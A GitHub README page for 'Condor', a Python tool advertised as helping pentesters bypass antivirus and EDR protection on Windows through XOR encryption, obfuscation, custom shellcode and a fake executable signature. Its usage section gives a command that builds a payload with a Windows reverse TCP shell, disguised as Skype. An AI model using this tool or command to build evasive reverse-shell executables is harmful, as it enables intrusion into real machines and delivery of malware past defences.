https://github.com/brosck/condor

「🛡️」AVs/EDRs Evasion tool

antivirus antivirus-evasion av bypass defender edr evasion hacking injection loader protection python security shellcode windows windows-defender xdr

Last synced: 7 months ago

「🛡️」About Condor

Condor is a tool created to help pentesters bypass protections like AVs/EDRs/XDRs in the Windows operating system. Condor was developed in Python and has several advantages to help pentesters.

## Executable Scan

![](assets/scan.png)

## Benefits

* Easy to use
* Bypass multiple AVs/EDRs/XDRs
* Two XOR encryption processes and an obfuscation
* The generated file is less than 7 MB
* Uses custom shellcode
* Fake signature on executable

## Environment support

| OS/Subsystem | Installation of All Requirements | Compilation | EXE Execution |
| ----------- | ----------- | ----------- | ----------- |
| Windows | ❌ | ✅ | ✅ |
| Linux | ✅ | ✅ | ❌ |
| Mac | not tested | not tested | not tested |
| WSL | ✅ | ✅ | ✅ |

## Help

![](assets/help.png)
[Reference](https://antiscan.me/scan/new/result?id=ioGKcbzBcSzj)

## Usage

It is recommended to run the tool in a WSL environment, as you will need to generate shellcode using msfvenom and compile to EXE using PyInstaller.

```
$ git clone https://github.com/Brosck/Condor.git
$ cd Condor
$ chmod +x install.sh
$ sudo ./install.sh
...
$ python3 condor.py -p windows/x64/shell/reverse_tcp -lh -lp -i skype
```

Wine must be installed on the machine in order to install Python. Install as shown in the screenshot:

![](assets/python-install.png)
